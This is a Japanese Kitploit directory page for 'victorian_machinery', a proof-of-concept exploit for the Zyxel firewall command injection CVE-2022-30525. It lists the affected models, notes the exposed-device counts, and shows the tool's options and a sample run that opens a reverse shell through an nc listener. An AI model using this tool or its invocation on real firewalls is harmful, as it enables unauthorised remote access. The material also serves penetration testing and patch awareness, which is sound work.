Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
victorian_machinery — CVE-2022-30525(Zxyel ファイアウォールのコマンドインジェクション)の概念実証エクスプロイト | Kitploit
ツール/GitHubGitHub/jbaines-r7/victorian_machinery
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubjbaines-r7/victorian_machinery

victorian_machinery

CVE-2022-30525(Zxyel ファイアウォールのコマンドインジェクション)の概念実証エクスプロイト

リポジトリを見る
301384年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Victorian Machinery

Victorian Machinery は CVE-2022-30525 の概念実証 (PoC) エクスプロイトです。この脆弱性は、ゼロタッチプロビジョニングをサポートする Zyxel ファイアウォールに影響する、認証不要かつリモートから利用可能なコマンドインジェクション脆弱性です。Zyxel は 2022 年 4 月 28 日にこの問題の修正をリリースしました。影響を受けることが確認されているモデルは以下のとおりです:

  • USG FLEX 100, 100W, 200, 500, 700
  • ATP 100, 200, 500, 700, 800
  • USG20-VPN and USG20w-VPN

本稿執筆時点で、Shodan 上には 16,000 台以上の影響を受けるデバイスが確認されていました。管理 Web インターフェースの公開はデフォルト設定ではありません。つまり、インターネットに公開されていない影響を受けるシステムがさらに多く存在することを示唆しています。これらのシステムは自動更新もサポートしています(デフォルトでは無効)が、かなりの割合がこの問題に対してすでにパッチ適用済みです。

PoC 動画

https://youtu.be/x8Vzq9tm47c

オプション

Victorian Machinery は、フォークした nc リスナーを使って標的を攻撃し、リバースシェルを取得します。これは Ubuntu 20.04 でテストされています。この PoC はデフォルトで /usr/bin/nc を実行しようとします。nc が別の場所にある場合は、nc-path オプションを更新する必要があります。完全なヘルプメニューは以下のとおりです:

root@kitploit:~
albinolobster@ubuntu:~/victorian_machinery$ python3 victorian_machinery.py --help $$\ $$\ $$\ $$\ $$\ $$ | $$ |\__| $$ | \__| $$ | $$ |$$\ $$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$$\ \$$\ $$ |$$ |$$ _____|\_$$ _| $$ __$$\ $$ __$$\ $$ | \____$$\ $$ __$$\ \$$\$$ / $$ |$$ / $$ | $$ / $$ |$$ | \__|$$ | $$$$$$$ |$$ | $$ | \$$$ / $$ |$$ | $$ |$$\ $$ | $$ |$$ | $$ |$$ __$$ |$$ | $$ | \$ / $$ |\$$$$$$$\ \$$$$ |\$$$$$$ |$$ | $$ |\$$$$$$$ |$$ | $$ | $$\ \_/ $$\__| \_______| \____$$\______$$\__| \__| \_______|\__| \__| $$$\ $$$ | $$ | \__| $$$$\ $$$$ | $$$$$$\ $$$$$$$\ $$$$$$$\ $$\ $$$$$$$\ $$$$$$\ $$$$$$\ $$\ $$\ $$\$$\$$ $$ | \____$$\ $$ _____|$$ __$$\ $$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ | $$ | $$ \$$$ $$ | $$$$$$$ |$$ / $$ | $$ |$$ |$$ | $$ |$$$$$$$$ |$$ | \__|$$ | $$ | $$ |\$ /$$ |$$ __$$ |$$ | $$ | $$ |$$ |$$ | $$ |$$ ____|$$ | $$ | $$ | $$ | \_/ $$ |\$$$$$$$ |\$$$$$$$\ $$ | $$ |$$ |$$ | $$ |\$$$$$$$\ $$ | \$$$$$$$ | \__| \__| \_______| \_______|\__| \__|\__|\__| \__| \_______|\__| \____$$ | $$\ $$ | ⚙ jbaines-r7 \$$$$$$ | CVE-2022-30525 \______/ 🦞 usage: victorian_machinery.py [-h] --rhost RHOST [--rport RPORT] --lhost LHOST [--lport LPORT] [--protocol PROTOCOL] [--nc-path NCPATH] Zyxel Firewall Command Injection (CVE-2022-30525) optional arguments: -h, --help show this help message and exit --rhost RHOST The remote address to exploit --rport RPORT The remote port to exploit --lhost LHOST The local address to connect back to --lport LPORT The local port to connect back to --protocol PROTOCOL The protocol handler to use --nc-path NCPATH The path to nc

使用例

root@kitploit:~
albinolobster@ubuntu:~/victorian_machinery$ python3 victorian_machinery.py --rhost 10.0.0.14 --lhost 10.0.0.28

$$\    $$\ $$\             $$\                         $$\                             
$$ |   $$ |\__|            $$ |                        \__|                            
$$ |   $$ |$$\  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$\  $$\  $$$$$$\  $$$$$$$\          
\$$\  $$  |$$ |$$  _____|\_$$  _|  $$  __$$\ $$  __$$\ $$ | \____$$\ $$  __$$\         
 \$$\$$  / $$ |$$ /        $$ |    $$ /  $$ |$$ |  \__|$$ | $$$$$$$ |$$ |  $$ |        
  \$$$  /  $$ |$$ |        $$ |$$\ $$ |  $$ |$$ |      $$ |$$  __$$ |$$ |  $$ |        
   \$  /   $$ |\$$$$$$$\   \$$$$  |\$$$$$$  |$$ |      $$ |\$$$$$$$ |$$ |  $$ |        
$$\ \_/  $$\__| \_______|   \____$$\______$$\__|      \__| \_______|\__|  \__|        
$$$\    $$$ |                    $$ |      \__|                                        
$$$$\  $$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\  $$\ $$$$$$$\   $$$$$$\   $$$$$$\  $$\   $$\ 
$$\$$\$$ $$ | \____$$\ $$  _____|$$  __$$\ $$ |$$  __$$\ $$  __$$\ $$  __$$\ $$ |  $$ |
$$ \$$$  $$ | $$$$$$$ |$$ /      $$ |  $$ |$$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |
$$ |\$  /$$ |$$  __$$ |$$ |      $$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |      $$ |  $$ |
$$ | \_/ $$ |\$$$$$$$ |\$$$$$$$\ $$ |  $$ |$$ |$$ |  $$ |\$$$$$$$\ $$ |      \$$$$$$$ |
\__|     \__| \_______| \_______|\__|  \__|\__|\__|  \__| \_______|\__|       \____$$ |
                                                                             $$\   $$ |
                                  ⚙ jbaines-r7                              \$$$$$$  |
                                 CVE-2022-30525                              \______/ 
                                       🦞                                             

[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Sending a POST request to https://10.0.0.14:443/ztp/cgi-bin/handler
Connection received on 10.0.0.14 43957
bash: cannot set terminal process group (10800): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$ id
id
uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)

クレジット

  • Red Hot Chili Peppers
ツールをダウンロード